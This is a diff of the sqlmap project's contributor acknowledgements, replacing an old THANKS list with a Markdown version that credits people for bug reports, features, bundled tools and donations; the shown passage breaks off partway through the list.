-Daniele Bellucci <daniele.bellucci@gmail.com>
-    for starting sqlmap project and developing it between July and August
-    2006
-
-Velky Brat <velkybrat@gmail.com>
-    for suggesting a minor enhancement to the bisection algorithm
-
-Jack Butler <fattredd@hotmail.com>
-    for providing me with the sqlmap site favicon
-
-Roberto Castrogiovanni <castrogiovanni.roberto@gmail.com>
-    for reporting a minor bug
-
-Cesar Cerrudo <cesar@argeniss.com>
-    for his Windows access token kidnapping tool Churrasco included in
-    sqlmap tree as a contrib library and used to run the stand-alone
-    payload stager on the target Windows machine as SYSTEM user if the
-    user wants to perform a privilege escalation attack,
-    http://www.argeniss.com/research/TokenKidnapping.pdf
-
-Karl Chen <quarl@cs.berkeley.edu>
-    for providing with the multithreading patch for the inference
-    algorithm
-
-Y P Chien <ypchien@cox.net>
-    for reporting a minor bug
-
-Pierre Chifflier <pollux@debian.org> and Mark Hymers <ftpmaster@debian.org>
-    for uploading and accepting the sqlmap Debian package to the official
-    Debian project repository
-
-Ulises U. Cune <ulises2k@gmail.com>
-    for reporting a bug
-
-Alessandro Curio <alessandro.curio@gmail.com>
-    for reporting a minor bug
-
-Stefano Di Paola <stefano.dipaola@wisec.it>
-    for suggesting good features
-
-Dan Guido <dguido@gmail.com>
-    for promoting sqlmap in the context of the Penetration Testing and
-    Vulnerability Analysis class at the Polytechnic University of New York,
-    http://isisblogs.poly.edu/courses/pentest/
-
-Adam Faheem <faheem.adam@is.co.za>
-    for reporting a few bugs
-
-James Fisher <www@sittinglittleduck.com>
-    for providing me with two very good feature requests
-    for his great tool too brute force directories and files names on
-    web/application servers, Dir Buster, http://tinyurl.com/dirbuster
-
-Jim Forster <jimforster@goldenwest.com>
-    for reporting a bug
-
-Rong-En Fan <rafan@freebsd.org>
-    for commiting the sqlmap 0.5 port to the official FreeBSD project
-    repository
-
-Giorgio Fedon <giorgio.fedon@gmail.com>
-    for suggesting a speed improvement for bisection algorithm
-    for reporting a bug when running against Microsoft SQL Server 2005
-
-Kasper Fons <thefeds@mail.dk>
-    for reporting a bug
-
-Alan Franzoni <alan.franzoni@gmail.com>
-    for helping me out with Python subprocess library
-
-Daniel G. Gamonal <lgrecol@gmail.com>
-    for reporting a minor bug
-
-Ivan Giacomelli <truemilk@insiberia.net>
-    for reporting a bug
-    for suggesting a minor enhancement
-    for reviewing the documentation
-
-Oliver Gruskovnjak <oliver.gruskovnjak@gmail.com>
-    for reporting a bug
-    for providing me with a minor patch
-
-Davide Guerri <d.guerri@caspur.it>
-    for suggesting an enhancement
-
-Kristian Erik Hermansen <kristian.hermansen@gmail.com>
-    for reporting a bug
-    for donating to sqlmap development
-
-Jorge Hoya <aquinadie@gmail.com>
-    for suggesting a minor enhancement
-
-Will Holcomb <wholcomb@gmail.com>
-    for his MultipartPostHandler class to handle multipart POST forms and
-    permission to include it within sqlmap source code
-
-Daniel Huckmann <sanitybit@gmail.com>
-    for reporting a couple of bugs
-
-Mounir Idrassi <mounir.idrassi@idrix.net>
-    for his compiled version of UPX for Mac OS X
-
-Dirk Jagdmann <doj@cubic.org>
-    for reporting a typo in the documentation
-
-Luke Jahnke <luke.jahnke@gmail.com>
-    for reporting a bug when running against MySQL < 5.0
-
-Sven Klemm <sven@c3d2.de>
-    for reporting two minor bugs with PostgreSQL
-
-Anant Kochhar <anant.kochhar@secureyes.net>
-    for providing me with feedback on the user's manual
-
-Alexander Kornbrust <ak@red-database-security.com>
-    for reporting a couple of bugs
-
-Krzysztof Kotowicz <kkotowicz@gmail.com>
-    for reporting a minor bug
-
-Nicolas Krassas <krasn@ans.gr>
-    for reporting a bug
-
-Guido Landi <lists@keamera.org>
-    for reporting a couple of bugs
-    for the great technical discussions
-    for Microsoft SQL Server 2000 and Microsoft SQL Server 2005
-    'sp_replwritetovarbin' stored procedure heap-based buffer overflow
-    (MS09-004) exploit development
-    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
-    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
-    November 20, 2009
-
-Lee Lawson <Lee.Lawson@dns.co.uk>
-    for reporting a minor bug
-
-Nico Leidecker <nico@leidecker.info>
-    for providing me with feedback on a few features
-    for reporting a couple of bugs
-
-Gabriel Lima <pato@bugnet.com.br>
-    for reporting a couple of bugs
-
-Pavol Luptak <pavol.luptak@nethemba.com>
-    for reporting a bug when injecting on a POST data parameter
-
-Michael Majchrowicz <mmajchrowicz@gmail.com>
-    for extensively beta-testing sqlmap on various MySQL DBMS
-    for providing really appreciated feedback
-    for suggesting a lot of ideas and features
-
-Ferruh Mavituna <ferruh@mavituna.com>
-    for providing me with ideas on the implementation of a couple of
-    new features
-
-Enrico Milanese <enricomilanese@gmail.com>
-    for reporting a bugs when using (-a) a single line User-Agent file
-    for providing me with some ideas for the PHP backdoor
-
-Roberto Nemirovsky <roberto.paes@gmail.com>
-    for pointing me out some enhancements
-
-Markus Oberhumer <markus.oberhumer@jk.uni-linz.ac.at>
-Laszlo Molnar <ml1050@cdata.tvnet.hu>
-John F. Reiser <sales@bitwagon.com>
-    for their great tool UPX (Ultimate Packer for eXecutables) included
-    in sqlmap tree as a contrib library and used mainly to pack the
-    Metasploit Framework 3 payload stager portable executable,
-    http://upx.sourceforge.net
-
-Simone Onofri <simone.onofri@gmail.com>
-    for patching the PHP web backdoor to make it work properly also on
-    Windows
-
-Antonio Parata <s4tan@ictsc.it>
-    for providing me with some ideas for the PHP backdoor
-
-Adrian Pastor <ap@gnucitizen.org>
-    for donating to sqlmap development
-
-Chris Patten <cpatten@sunera.com>
-    for reporting a bug in the blind SQL injection bisection algorithm
-
-Adam Pridgen <adam.pridgen@gmail.com>
-    for suggesting some features
-
-Alberto Revelli <r00t@northernfortress.net>
-    for inspiring me to write sqlmap user's manual in SGML
-    for his great Microsoft SQL Server take over tool, sqlninja,
-    http://sqlninja.sourceforge.net
-
-Andres Riancho <andres.riancho@gmail.com>
-    for beta-testing sqlmap
-    for reporting a bug and suggesting some features
-    for including sqlmap in his great web application audit and attack
-    framework, w3af, http://w3af.sourceforge.net
-
-Antonio Riva <antonio.riva@gmail.com>
-    for reporting a bug when running with python 2.5
-
-Richard Safran <allapplyhere@yahoo.com>
-    for donating the sqlmap.org domain control
-
-Tomoyuki Sakurai <cherry@trombik.org>
-    for submitting to the FreeBSD project the sqlmap 0.5 port
-
-Philippe A. R. Schaeffer <schaeff@compuphil.de>
-    for reporting a minor bug
-
-Sven Schluter <sschlueter@netzwerk.cc>
-    for providing with a patch for waiting a number of seconds between
-    each HTTP request
-
-Uemit Seren <uemit.seren@gmail.com>
-    for reporting a minor adjustment when running with python 2.6
-
-Sumit Siddharth <sid@notsosecure.com>
-    for providing me with ideas on the implementation of a couple of
-    features
-
-M Simkin <mlsimkin@cox.net>
-    for suggesting a feature
-
-Konrads Smelkovs <konrads@smelkovs.com>
-    for reporting a few bugs in --sql-shell and --sql-query on Microsoft
-    SQL Server
-
-Marek Stiefenhofer <m.stiefenhofer@r-tec.net>
-    for reporting a bug
-
-Jason Swan <jasoneswan@gmail.com>
-    for reporting a bug when enumerating columns on Microsoft SQL Server
-    for suggesting a couple of improvements
-
-Alessandro Tanasi <alessandro@tanasi.it>
-    for extensively beta-testing sqlmap
-    for suggesting many features and reporting some bugs
-    for reviewing the documentation
-
-Andres Tarasco <atarasco@gmail.com>
-    for providing me with good feedback
-
-Efrain Torres <et@metasploit.com>
-    for helping me out to improve the Metasploit Framework 3 sqlmap
-    auxiliary module and for commiting it on the Metasploit official
-    subversion repository
-    for his great Metasploit WMAP Framework
-
-Sandro Tosi <matrixhasu@gmail.com>
-    for helping to create sqlmap Debian package correctly
-
-Bedirhan Urgun <bedirhanurgun@gmail.com>
-    for reporting a few bugs
-    for suggesting some features and improvements
-    for benchmarking sqlmap in the context of his SQL injection
-    benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
-
-Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
-    for reporting an unhandled connection exception
-
-Anthony Zboralski <anthony.zboralski@bellua.com>
-    for providing me with detailed feedback
-    for reporting a few minor bugs
-    for donating to sqlmap development
-
-dsu <dsu@dsu.com.ua>
-    for reporting a bug
-
-fufuh <fufuh@users.sourceforge.net>
-    for reporting a bug when running on Windows
-
-mariano <marianoso@gmail.com>
-    for reporting a bug
-
-pacman730 <pacman730@users.sourceforge.net>
-    for reporting a bug
-
-Stuffe <stuffe.dk@gmail.com>
-    for reporting a minor bug and a feature request
-
-Sylphid <sylphid.su@sti.com.tw>
-    for suggesting some features
-
-
-== Organizations ==
-
-Black Hat team <info@blackhat.com>
-    for the opportunity to present my research on 'Advanced SQL injection
-    to operating system full control' at Black Hat Europe 2009 Briefings on
-    April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of
-    the sqlmap 0.7 release candidate version new features during my
-    presentation
-
-Metasploit LLC <msfdev@metasploit.com>
-    for their powerful tool Metasploit Framework 3, used by sqlmap, among
-    others things, to create the payload stager and establish an
-    out-of-band connection between sqlmap and the database server,
-    http://www.metasploit.com/framework
-
-OWASP Board <http://www.owasp.org>
-    for sponsoring part of the sqlmap development in the context of OWASP
-    Spring of Code 2007

doc/THANKS.md

@@ -0,0 +1,799 @@
+# Individuals
+
+Andres Tarasco Acuna, <atarasco(at)gmail.com>
+* for suggesting a feature
+
+Santiago Accurso, <saccurso(at)skygear.com.ar>
+* for reporting a bug
+
+Syed Afzal, <syed(at)syedafzal.in>
+* for contributing a WAF script varnish.py
+
+Zaki Akhmad, <zakiakhmad(at)gmail.com>
+* for suggesting a couple of features
+
+Olu Akindeinde, <seyi.akin(at)gmail.com>
+* for reporting a couple of bugs
+
+David Alvarez, <david.alvarez.s(at)gmail.com>
+* for reporting a bug
+
+Sergio Alves, <sergioalexandre.alves(at)gmail.com>
+* for reporting a bug
+
+Thomas Anderson, <darkc0de(at)live.com.ph>
+* for reporting a bug
+
+Chip Andrews, <chip(at)sqlsecurity.com>
+* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
+
+Smith Andy, <teh.one(at)hotmail.com>
+* for suggesting a feature
+
+Otavio Augusto, <otavioarj(at)gmail.com>
+* for reporting a minor bug
+
+Simon Baker, <simonb(at)sec-1.com>
+* for reporting some bugs
+
+Ryan Barnett, <RBarnett(at)trustwave.com>
+* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
+
+Emiliano Bazaes, <emiliano(at)7espejos.com>
+* for reporting a minor bug
+
+Daniele Bellucci, <daniele.bellucci(at)gmail.com>
+* for starting sqlmap project and developing it between July and August 2006
+
+Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
+* for contributing the DB2 support initial patch: fingerprint and enumeration
+
+Anthony Boynes, <aboynes(at)gmail.com>
+* for reporting several bugs
+
+Marcelo Toscani Brandao
+* for reporting a bug
+
+Velky Brat, <velkybrat(at)gmail.com>
+* for suggesting a minor enhancement to the bisection algorithm
+
+James Briggs, <james.briggs(at)ngssecure.com>
+* for suggesting a minor enhancement
+
+Gianluca Brindisi, <g(at)brindi.si>
+* for reporting a couple of bugs
+
+Jack Butler, <fattredd(at)hotmail.com>
+* for contributing the sqlmap site favicon
+
+Ulisses Castro, <uss.thebug(at)gmail.com>
+* for reporting a bug
+
+Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
+* for reporting a minor bug
+
+Cesar Cerrudo, <cesar(at)argeniss.com>
+* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
+
+Karl Chen, <quarl(at)cs.berkeley.edu>
+* for contributing the initial multi-threading patch for the inference algorithm
+
+Y P Chien, <ypchien(at)cox.net>
+* for reporting a minor bug
+
+Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
+* for uploading and accepting the sqlmap Debian package to the official Debian project repository
+
+Hysia Chow <hysia(at)icloud.com>
+* for contributing a couple of WAF scripts
+
+Chris Clements, <cclements(at)flatearth.net>
+* for reporting a couple of bugs
+
+John Cobb, <johnc(at)nobytes.com>
+* for reporting a minor bug
+
+Andreas Constantinides, <megahz(at)megahz.org>
+* for reporting a minor bug
+
+Andre Costa, <andre.investorsclub(at)gmail.com>
+* for reporting a minor bug
+* for suggesting a minor enhancement
+
+Ulises U. Cune, <ulises2k(at)gmail.com>
+* for reporting a bug
+
+Alessandro Curio, <alessandro.curio(at)gmail.com>
+* for reporting a minor bug
+
+Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
+* for reporting a couple of bugs
+
+Sherif El-Deeb, <archeldeeb(at)gmail.com>
+* for reporting a minor bug
+
+Stefano Di Paola, <stefano.dipaola(at)wisec.it>
+* for suggesting good features
+
+Mosk Dmitri, <ya(at)darkbyte.ru>
+* for reporting a minor bug
+
+Meng Dong, <whenov(at)gmail.com>
+* for contributing a code for Waffit integration
+
+Carey Evans, <careye(at)spamcop.net>
+* for his fcrypt module that allows crypt(3) support
+    on Windows platforms
+
+Shawn Evans, <shawndevans(at)gmail.com>
+* for suggesting an idea for one tamper script, greatest.py
+
+Adam Faheem, <faheem.adam(at)is.co.za>
+* for reporting a few bugs
+
+James Fisher, <www(at)sittinglittleduck.com>
+* for contributing two very good feature requests
+* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
+
+Jim Forster, <jimforster(at)goldenwest.com>
+* for reporting a bug
+
+Rong-En Fan, <rafan(at)freebsd.org>
+* for commiting the sqlmap 0.5 port to the official FreeBSD project repository
+
+Giorgio Fedon, <giorgio.fedon(at)gmail.com>
+* for suggesting a speed improvement for bisection algorithm
+* for reporting a bug when running against Microsoft SQL Server 2005
+
+Kasper Fons, <thefeds(at)mail.dk>
+* for reporting several bugs
+
+Jose Fonseca, <jose.r.fonseca(at)gmail.com>
+* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
+    http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
+    http://code.google.com/p/jrfonseca/wiki/XDot
+
+Alan Franzoni, <alan.franzoni(at)gmail.com>
+* for helping out with Python subprocess library
+
+Harold Fry, <harold(at)violaceo.us>
+* for suggesting a minor enhancement
+
+Daniel G. Gamonal, <lgrecol(at)gmail.com>
+* for reporting a minor bug
+
+Marcos Mateos Garcia, <mmateos(at)germinus.com>
+* for reporting a minor bug
+
+Andrew Gecse, <andrew.gecse(at)upcmail.hu>
+* for reporting a minor issue
+
+Ivan Giacomelli, <truemilk(at)insiberia.net>
+* for reporting a bug
+* for suggesting a minor enhancement
+* for reviewing the documentation
+
+Dimitris Giannitsaros, <daremon(at)gmail.com>
+* for contributing a REST-JSON API client
+
+Nico Golde, <nico(at)ngolde.de>
+* for reporting a couple of bugs
+
+Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
+* for reporting a bug
+* for contributing a minor patch
+
+Davide Guerri, <d.guerri(at)caspur.it>
+* for suggesting an enhancement
+
+Dan Guido, <dguido(at)gmail.com>
+* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
+
+David Guimaraes, <skysbsb(at)gmail.com>
+* for reporting considerable amount of bugs
+* for suggesting several features
+
+Chris Hall, <chris.hall(at)mod10.net>
+* for coding the prettyprint.py library
+
+Tate Hansen, <tate(at)clearnetsec.com>
+* for donating to sqlmap development
+
+Mario Heiderich, <mario.heiderich(at)gmail.com>
+Christian Matthies, <ch0012(at)gmail.com>
+Lars H. Strojny, <lars(at)strojny.net>
+* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
+
+Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
+* for reporting a bug
+* for donating to sqlmap development
+
+Alexander Hagenah, <ah(at)primepage.de>
+* for reporting a minor bug
+
+Dennis Hecken, <mail(at)8dh.de>
+* for reporting a minor bug
+
+Choi Ho, <counterhacker815(at)gmail.com>
+* for reporting a minor bug
+
+Jorge Hoya, <aquinadie(at)gmail.com>
+* for suggesting a minor enhancement
+
+Will Holcomb, <wholcomb(at)gmail.com>
+* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
+
+Daniel Huckmann, <sanitybit(at)gmail.com>
+* for reporting a couple of bugs
+
+Daliev Ilya, <daliser(at)yandex.ru>
+* for reporting a bug
+
+Mehmet İnce, <mehmet(at)mehmetince.net>
+* for contributing a tamper script xforwardedfor.py
+
+Jovon Itwaru, <jovon.itwaru(at)gmail.com>
+* for reporting a minor bug
+
+Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
+* for reporting a bug
+
+Dirk Jagdmann, <doj(at)cubic.org>
+* for reporting a typo in the documentation
+
+Luke Jahnke, <luke.jahnke(at)gmail.com>
+* for reporting a bug when running against MySQL < 5.0
+
+Andrew Kitis <andrew.kitis(at)gmail.com>
+* for contributing a tamper script lowercase.py
+
+David Klein, <david.klein(at)ipfocus.com.au>
+* for reporting a minor code improvement
+
+Sven Klemm, <sven(at)c3d2.de>
+* for reporting two minor bugs with PostgreSQL
+
+Anant Kochhar, <anant.kochhar(at)secureyes.net>
+* for providing with feedback on the user's manual
+
+Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
+* for reporting a minor bug
+
+Alexander Kornbrust, <ak(at)red-database-security.com>
+* for reporting a couple of bugs
+
+Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
+* for reporting a minor bug
+
+Nicolas Krassas, <krasn(at)deventum.com>
+* for reporting a couple of bugs
+
+Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
+* for contributing a minor patch
+
+Alex Landa, <landa.alex86(at)gmail.com>
+* for contributing a patch adding beta support for XML output
+
+Guido Landi, <lists(at)keamera.org>
+* for reporting a couple of bugs
+* for the great technical discussions
+* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
+* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
+
+Lee Lawson, <Lee.Lawson(at)dns.co.uk>
+* for reporting a minor bug
+
+John J. Lee, <jjl(at)pobox.com> and others
+* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
+
+Nico Leidecker, <nico(at)leidecker.info>
+* for providing with feedback on a few features
+* for reporting a couple of bugs
+* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
+
+Gabriel Lima, <pato(at)bugnet.com.br>
+* for reporting a couple of bugs
+
+Svyatoslav Lisin, <sel(at)3d-tech.ru>
+* for suggesting a minor feature
+
+Miguel Lopes, <theoverblue(at)gmail.com>
+* for reporting a minor bug
+
+Truong Duc Luong, <luongductruong(at)gmail.com>
+* for reporting a minor bug
+
+Pavol Luptak, <pavol.luptak(at)nethemba.com>
+* for reporting a bug when injecting on a POST data parameter
+
+Till Maas, <opensource(at)till.name>
+* for suggesting a minor feature
+
+Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
+* for extensively beta-testing sqlmap on various MySQL DBMS
+* for providing really appreciated feedback
+* for suggesting a lot of ideas and features
+
+Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
+* for contributing a Portuguese translation of README.md
+
+Ahmad Maulana, <matdhule(at)gmail.com>
+* for contributing a tamper script halfversionedmorekeywords.py
+
+Ferruh Mavituna, <ferruh(at)mavituna.com>
+* for exchanging ideas on the implementation of a couple of features
+
+David McNab, <david(at)conscious.co.nz>
+* for his XMLObject module that allows XML files to be operated on  like Python objects
+
+Spencer J. McIntyre, <smcintyre(at)securestate.com>
+* for reporting a minor bug
+* for contributing a patch for OS fingerprinting on DB2
+
+Brad Merrell, <bradmer12(at)gmail.com>
+* for reporting a minor bug
+
+Michael Meyer, <m.meyer2k(at)gmail.com>
+* for suggesting a minor feature
+
+Enrico Milanese, <enricomilanese(at)gmail.com>
+* for reporting a minor bug
+* for sharing some ideas for the PHP backdoor
+
+Liran Mimoni, <reactor.leet(at)gmail.com>
+* for reporting a minor bug
+
+Marco Mirandola, <mmmccc0(at)gmail.com>
+* for reporting a minor bug
+
+Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
+* for reporting a minor bug
+
+Anton Mogilin, <azarmaster81(at)yahoo.com>
+* for reporting a few bugs
+
+Sergio Molina, <smolina(at)wpr.es>
+* for reporting a minor bug
+
+Anastasios Monachos, <anastasiosm(at)gmail.com>
+* for providing some useful data
+* for suggesting a feature
+* for reporting a couple of bugs
+
+Kirill Morozov, <l0rda(at)l0rda.biz>
+* for reporting a bug
+* for suggesting a feature
+
+Alejo Murillo Moya, <alex(at)65535.com>
+* for reporting a minor bug
+* for suggesting a few features
+
+Yonny Mutai, <yonnym(at)googlemail.com>
+* for reporting a minor bug
+
+Roberto Nemirovsky, <roberto.paes(at)gmail.com>
+* for pointing out some enhancements
+
+Sebastian Nerz, <sebastian.nerz(at)syss.de>
+* for reporting a (potential) vulnerability in --eval
+
+Simone Onofri, <simone.onofri(at)gmail.com>
+* for patching the PHP web backdoor to make it work properly also on Windows
+
+Michele Orru, <michele.orru(at)antisnatchor.com>
+* for reporting a couple of bug
+* for suggesting ideas on how to implement the RESTful API
+
+Shaohua Pan, <pan(at)knownsec.com>
+* for reporting several bugs
+* for suggesting a few features
+
+Antonio Parata, <s4tan(at)ictsc.it>
+* for sharing some ideas for the PHP backdoor
+
+Adrian Pastor, <ap(at)gnucitizen.org>
+* for donating to sqlmap development
+
+Christopher Patten, <cpatten(at)sunera.com>
+* for reporting a bug in the blind SQL injection bisection algorithm
+
+Zack Payton, <zack.payton(at)executiveinstruments.com>
+* for reporting a minor bug
+
+Jaime Penalba, <nighterman(at)painsec.com>
+* for contributing a patch for INSERT/UPDATE generic boundaries
+
+Pedrito Perez, <0ark1ang3l(at)gmail.com>
+* for reporting a couple of bugs
+
+Brandon Perry, <bperry.volatile(at)gmail.com>
+* for reporting a couple of bugs
+
+Travis Phillips, <perfect_insanity2004(at)yahoo.com>
+* for suggesting a minor enhancement
+
+Mark Pilgrim, <mark(at)diveintomark.org>
+* for porting chardet package (Universal Encoding Detector) to Python
+
+Steve Pinkham, <steve.pinkham(at)gmail.com>
+* for suggesting a feature
+* for contributing a new SQL injection vector (MSSQL time-based blind)
+* for donating to sqlmap development
+
+Adam Pridgen, <adam.pridgen(at)gmail.com>
+* for suggesting some features
+
+Luka Pusic, <luka(at)pusic.si>
+* for reporting a couple of bugs
+
+Ole Rasmussen, <olerass(at)gmail.com>
+* for reporting a bug
+* for suggesting a feature
+
+Alberto Revelli, <r00t(at)northernfortress.net>
+* for inspiring to write sqlmap user's manual in SGML
+* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
+
+David Rhoades, <david.rhoades(at)mavensecurity.com>
+* for reporting a bug
+
+Andres Riancho, <andres.riancho(at)gmail.com>
+* for beta-testing sqlmap
+* for reporting a bug and suggesting some features
+* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
+* for suggesting a way for handling DNS caching
+
+Jamie Riden, <jamie.riden(at)ngssecure.com>
+* for reporting a minor bug
+
+Alexander Rigbo, <alex(at)rigbo.se>
+* for contributing a minor patch
+
+Antonio Riva, <antonio.riva(at)gmail.com>
+* for reporting a bug when running with python 2.5
+
+Ethan Robish, <ethan.robish(at)gmail.com>
+* for reporting a bug
+
+Levente Rog, <levidos(at)gmail.com>
+* for reporting a minor bug
+
+Andrea Rossi, <andyroyalbattle(at)yahoo.it>
+* for reporting a minor bug
+* for suggesting a feature
+
+Frederic Roy, <frederic.roy(at)telindus.fr>
+* for reporting a couple of bugs
+
+Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
+* for suggesting a couple of minor enhancements
+
+Richard Safran, <allapplyhere(at)yahoo.com>
+* for donating the sqlmap.org domain
+
+Tomoyuki Sakurai, <cherry(at)trombik.org>
+* for submitting to the FreeBSD project the sqlmap 0.5 port
+
+Roberto Salgado, <lightos(at)gmail.com>
+* for contributing considerable amount of tamper scripts
+
+Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
+* for reporting considerable amount of bugs
+
+Marek Sarvas, <marek.sarvas(at)gmail.com>
+* for reporting several bugs
+
+Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
+* for reporting a minor bug
+
+Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
+* for reporting a minor bug
+
+Jorge Santos, <jorge_a_santos(at)hotmail.com>
+* for reporting a minor bug
+
+Sven Schluter, <sschlueter(at)netzwerk.cc>
+* for contributing a patch
+* for waiting a number of seconds between each HTTP request
+
+Ryan Sears, <rdsears(at)mtu.edu>
+* for suggesting a couple of enhancements
+* for donating to sqlmap development
+
+Uemit Seren, <uemit.seren(at)gmail.com>
+* for reporting a minor adjustment when running with python 2.6
+
+Shane Sewell, <ssewell(at)gmail.com>
+* for suggesting a feature
+
+Ahmed Shawky, <ahmed(at)isecur1ty.org>
+* for reporting a major bug with improper handling of parameter values
+* for reporting a bug
+
+Brian Shura, <bshura(at)appsecconsulting.com>
+* for reporting a bug
+
+Sumit Siddharth, <sid(at)notsosecure.com>
+* for sharing ideas on the implementation of a couple of features
+
+Andre Silva, <andreoaz(at)gmail.com>
+* for reporting a bug
+
+Benjamin Silva H. <silva96(at)gmail.com>
+* for reporting a bug
+
+Duarte Silva <duarte.silva(at)serializing.me>
+* for reporting a couple of bugs
+
+M Simkin, <mlsimkin(at)cox.net>
+* for suggesting a feature
+
+Konrads Smelkovs, <konrads(at)smelkovs.com>
+* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
+
+Chris Spencer, <chris.spencer(at)ngssecure.com>
+* for reviewing the user's manual grammar
+
+Michael D. Stenner, <mstenner(at)linux.duke.edu>
+* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
+
+Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
+* for reporting a few bugs
+
+Jason Swan, <jasoneswan(at)gmail.com>
+* for reporting a bug when enumerating columns on Microsoft SQL Server
+* for suggesting a couple of improvements
+
+Chilik Tamir, <phenoman(at)gmail.com>
+* for contributing a patch for initial support SOAP requests
+
+Alessandro Tanasi, <alessandro(at)tanasi.it>
+* for extensively beta-testing sqlmap
+* for suggesting many features and reporting some bugs
+* for reviewing the documentation
+
+Andres Tarasco, <atarasco(at)gmail.com>
+* for contributing good feedback
+
+Tom Thumb, <k1971(at)live.co.uk>
+* for reporting a major bug
+
+Kazim Bugra Tombul, <mhackmail(at)gmail.com>
+* for reporting a minor bug
+
+Efrain Torres, <et(at)metasploit.com>
+* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
+* for his great Metasploit WMAP Framework
+
+Sandro Tosi, <matrixhasu(at)gmail.com>
+* for helping to create sqlmap Debian package correctly
+
+Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
+* for reporting several bugs
+
+Vitaly Turenko, <dsu(at)dsu.com.ua>
+* for reporting a bug
+
+Augusto Urbieta, <x2xpy50(at)gmail.com>
+* for reporting a minor bug
+
+Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
+* for reporting a few bugs
+* for suggesting some features and improvements
+* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
+
+Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
+* for reporting a couple of minor bugs
+
+Vlado Velichkovski, <ketejadam(at)hotmail.com>
+* for reporting considerable amount of bugs
+* for suggesting an enhancement
+
+Johnny Venter, <johnny.venter(at)zoho.com>
+* for reporting a couple of bugs
+
+Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
+* for suggesting couple of good features
+
+Patrick Webster, <patrick(at)aushack.com>
+* for suggesting an enhancement
+
+Ed Williams, <ed.williams(at)ngssecure.com>
+* for suggesting a minor enhancement
+
+Anthony Zboralski, <anthony.zboralski(at)bellua.com>
+* for providing with detailed feedback
+* for reporting a few minor bugs
+* for donating to sqlmap development
+
+Thierry Zoller, <thierry(at)zoller.lu>
+* for reporting a couple of major bugs
+
+Zhen Zhou, <zhouzhenster(at)gmail.com>
+* for suggesting a feature
+
+-insane-, <insane_(at)gmx.de>
+* for reporting a minor bug
+
+1ndr4 joe, <c0d3w4st3r(at)gmail.com>
+* for reporting a couple of bugs
+
+abc abc, <biedimc(at)gmx.net>
+* for reporting a minor bug
+
+Abuse 007, <abuse007(at)gmail.com>
+* for reporting a bug
+
+agix, <florian.gaultier@gmail.com>
+* for contributing the file upload via certutil.exe functionality
+
+Alex, <m3zero(at)gmail.com>
+* for reporting a minor bug
+
+anonymous anonymous, <tmp(at)2ch.so>
+* for reporting a couple of bugs
+
+bamboo, <roberthacksley(at)gmail.com>
+* for reporting a couple of bugs
+
+Brandon E., <brandonpoc(at)gmail.com>
+* for reporting a bug
+
+black zero, <timeisflowing(at)gmail.com>
+* for reporting a minor bug
+
+blueBoy, <blueboy4444(at)gmail.com>
+* for reporting a bug
+
+buawig, <buawig(at)gmail.com>
+* for reporting considerable amount of bugs
+
+Bugtrace, <bugtrace(at)gmail.com>
+* for reporting several bugs
+
+cats, <dump(at)alcor.se>
+* for reporting a couple of bugs
+
+Christian S, <christian_s(at)linuxmail.org>
+* for reporting a minor bug
+
+clav, <elclav(at)gmail.com>
+* for reporting a minor bug
+
